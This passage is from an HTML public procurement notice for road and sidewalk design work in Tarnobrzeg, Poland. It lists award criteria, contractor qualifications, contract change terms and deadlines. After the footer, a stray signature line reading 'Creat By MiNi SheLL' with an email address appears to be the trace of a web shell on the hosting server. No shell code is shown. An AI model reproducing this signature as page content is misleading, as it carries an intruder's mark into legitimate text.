class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlegaodrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach kryteriów ustalonych wSWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 5. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzoremautorskimdla zadania inwestycyjnego pn. ,,Budowa chodnika na ul. Piekarskiej w Tarnobrzegu”.Zakres:-branża drogowa: budowa chodnika ul. Piekarskiej od ul. Sienkiewicza do wysokości ul. Ludowej,-branża sanitarna: odwodnienie,- wykonanie stałej organizacji ruchu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">74 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 6. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzoremautorskimdla zadania inwestycyjnego pn. ,,Budowa chodnika wzdłuż ulicy Sieleckiej w Tarnobrzegu.Zakres:- branża drogowa: budowa chodnika wzdłuż ul. Sieleckiej od ulicy Warszawskiej do ulicyPrzechodniej po prawej stronie,- branża sanitarna: odwodnienie,- wykonanie stałej organizacjiruchu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71630000-3 - Usługi kontroli i nadzoru technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">76 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 7. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzorem autorskimdla zadania inwestycyjnego pn.: Przebudowa drogi gminnej ul. Sztygarów od skrzyżowania z ul.Królowej Jadwigi do skrzyżowania z ul. Św. Kingi w Tarnobrzegu.Zakres: - branża drogowa:jezdnia, chodniki, skrzyżowanie (w razie potrzeby), - branża sanitarna: odwodnienie, kanalizacjadeszczowa, - branża elektryczna: oświetlenie drogowe, - branża teletechniczna: wykonaniekanału technologicznego (w razie potrzeby), - wykonanie stałej organizacji ruchu, -inwentaryzacja drzew do wycinki wraz z nasadzeniami zastępczymi (w razie potrzeby), -elementy małej architektury - kosze na śmieci, ławki, stojaki na rowery, wiaty przystankowe itp.(w razie potrzeby w uzgodnieniu z Zamawiającym). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71630000-3 - Usługi kontroli i nadzoru technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez zamawiającego warunki udziału w postępowaniu.2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 1)	zdolności do występowania w obrocie gospodarczymZamawiający nie stawia warunku w powyższym zakresie.2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisówZamawiający nie stawia warunku w powyższym zakresie.3)	sytuacji ekonomicznej lub finansowejZamawiający nie stawia warunku w powyższym zakresie.4)	zdolności technicznej lub zawodowej4).1. potencjał techniczny Zamawiający nie stawia warunku w powyższym zakresie. 4).2. potencjał zawodowy1/ Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże osoby skierowane przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialne za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Wykonawca przedstawi wraz z ofertą osoby, na funkcje wymienione poniżej, które spełniają następujące wymagania:Osoba proponowana do pełnienia funkcji Projektant: a) Branży drogowej- minimalne doświadczenie i kwalifikacje:Doświadczenie: wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej 1 dokumentację projektową zawierającą w swoim zakresie budowę, rozbudowę, przebudowę lub odbudowę drogi.Kwalifikacje: posiada uprawnienia budowlane w specjalności inżynieryjnej drogowej bez ograniczeń do projektowania dróg w rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 roku, poz. 831 z późniejszymi zmianami).Dotyczy zadań: 1-7.b) Branży sanitarnej- minimalne doświadczenie i kwalifikacje:Kwalifikacje: posiada uprawnienia budowlane bez ograniczeń do projektowania sieci instalacji i urządzeń kanalizacyjnych w rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 roku, poz. 831 z późniejszymi zmianami).Dotyczy zadań: 1-7.c) Branży elektrycznej- minimalne doświadczenie i kwalifikacje : Kwalifikacje: posiada uprawnienia budowlane bez ograniczeń do projektowania sieci, instalacji, urządzeń elektrycznych w rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 roku, poz. 831 z późniejszymi zmianami).Dotyczy zadań: 1-3, 7.Uwaga: Zamawiający uzna uprawnienia równoważne do powyższych wydane na podstawie wcześniej obowiązujących przepisów prawa. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykaz osób, skierowanych przez Wykonawcę do realizacjizamówieniapublicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lubkierowanierobotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a takżezakresuwykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymiosobami(załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji iInformacji oDziałalności Gospodarczej w zakresie art.109 ust.1 pkt.4 ustawy, sporządzonych niewcześniej niż 3miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lubewidencji;b)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawcanie zalega zopłacaniem podatków i opłat w zakresie art.109 ust.1 pkt.1 ustawy, wystawionego niewcześniej niż 3miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lubopłat wraz zzaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, zeodpowiednio przedupływem terminu składania ofert wykonawca dokonał płatności należnych podatkówlub opłat wraz zodsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tychnależności)c) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnejZakładuUbezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówkiterenowejKasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalegazopłacaniem składek na ubezpieczenia społeczne i zdrowotne w zakresie art. 109 ust.1 pkt. 1ustawy,wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zaleganiazopłaceniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innymdokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednioprzedupływem terminu składania ofert wykonawca dokonał płatności należnych składek naubezpieczeniaspołeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążąceporozumienie w sprawiespłat tych należności;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Zamawiający nie określaszczególnego sposobu spełniania przez wykonawców wspólnie ubiegających się o udzieleniezamówienia warunków udziału w postępowaniu.2. Warunek dotyczący uprawnień doprowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art.112ust.2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się oudzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalnościgospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do którychrealizacji te uprawnienia są wymagane.3. W odniesieniu do warunków dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający sięoudzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzywykonająroboty budowlane lub usługi, do realizacji których te zdolności są wymagane.4. Wprzypadku, o którym mowa w ust. 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie zamówieniadołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albodo oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonająposzczególniwykonawcy.5. W przypadku, o którym mowa w ust.1, wykonawcyustanawiająpełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówieniaalbo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego.Pełnomocnictwo winno być załączone do oferty. Wszelka korespondencjaprowadzona będzie wyłącznie z pełnomocnikiem. 6. W przypadku Wykonawców wspólnieubiegających się o udzielenie zamówienia, oświadczenie o niepodleganiu wykluczeniu ispełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców. Oświadczenie toma potwierdzać brakpodstaw wykluczenia oraz spełniania warunków udziału w zakresie, w jakimkażdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.7. Jeżeli zostaławybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiającymoże żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowyregulującejwspółpracę tych wykonawców.8. Wykonawcy wspólnie ubiegający się o zamówienieponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia,określoną w art. 366 Kodeksu cywilnego. 9. Oferta wspólna, składana przez dwóch lub więcejWykonawców, powinna spełniać następujące wymagania:• Oferta wspólna powinnabyćsporządzona zgodnie z SWZ,• Sposób składania dokumentów w ofercie wspólnej:-dokumenty, dotyczące własnej firmy, takie jak np. oświadczenie o braku podstaw dowykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu;-dokumenty wspólne takie jak np. formularz ofertowy, formularz cenowy, dokumenty podmiotowei przedmiotoweskłada pełnomocnik Wykonawców w imieniu wszystkich Wykonawcówskładających ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonania w Umowie następujących zmian:1) Skrócenialub wydłużenia terminu wykonania przedmiotu Umowy w przypadku zaistnienia okolicznościwskazanej w ust. 2,2) Zmniejszenia lub zwiększenia wysokości wynagrodzenia należnegoWykonawcy z tytułu okoliczności określonych w § 16 ust. 2 pkt 5, ust. 2 pkt 8, ust. 5.3)Zmniejszenia zakresu przedmiotu Umowy wraz z ograniczeniem należnego Wykonawcywynagrodzenia.4) W szczególnie uzasadnionych okolicznościach wykonania dodatkowegozakresu robót, tj. zakresu rzeczowo nieprzewidzianego w zamówieniu, którego wykonanie leżywinteresie publicznym; 2. Strony przewidują możliwość zmiany (skrócenia albo wydłużenia)terminu wykonania przedmiotu Umowy, wyłącznie z przyczyn niezależnych od Wykonawcy imających wpływ na wykonanie przedmiotu umowy, w przypadku zaistnienia następującychokoliczności: 1) siły wyższej, to znaczy niezależnego od stron losowego zdarzeniazewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremunie można było zapobiec mimo dochowania należytej staranności; zmiana terminu realizacjioliczbę dni oddziaływania zdarzenia zewnętrznego, 2) wezwania przez organy administracjipublicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy o czas niezbędnyna uzupełnienie, 3) przekroczenia przewidzianych przepisami prawa terminów trwaniaproceduradministracyjnych, liczonych zgodnie z zasadami określonymi w kodeksiepostępowania administracyjnego; zmiana terminu realizacji o liczbę dni przekroczeniaprzewidzianych przepisami prawa terminów, 4) szczególnie uzasadnionych trudności wpozyskiwaniu materiałów wyjściowych do umowy; zmiana terminu realizacji o liczbę dni ichpozyskania,5) zmianyprzepisów prawa, istotnie wpływającego za termin lub zakres niniejszejumowy 6) udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego, od którychwykonania uzależnione jest wykonanie zamówienia podstawowego, jeżeli terminy ich zlecenia,rodzaj lub zakresuniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacjiumowy. W takimprzypadku termin wykonania zamówienia podstawowego może być przesuniętyo czas niezbędny na zlecenie i wykonanie zamówienia dodatkowego lub zamiennego, 7)udzielenie przez Zamawiającego innego zamówienia istotnie wpływającego na zakres lub terminrealizacjininiejszej umowy8) wydania polecenia zmiany,9) w przypadku przyczyn niezależnychod Wykonawcy i mających wpływ na wykonanie przedmiotu Umowy, które nie zostałyprzewidziane w ustępach poprzedzających, a z przyczyn obiektywnych uniemożliwiło wykonaniezamówienia w przewidzianym pierwotnie terminie. 3. W przypadku określonym w ust. 1 i 2Wykonawca jestzobowiązany do powiadomienia Zamawiającego w terminie 7 dni o zaistnieniuww. sytuacji i jej wpływie na harmonogram i/lub koszt realizacji przedmiotu umowy pod rygoremwygaśnięcia roszczenia. Zamawiający jest zobowiązany do przedstawienia stanowiska wprzedmiotowej sprawie w terminie 7 dni od otrzymania powiadomienia Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożeniaoferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-22</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com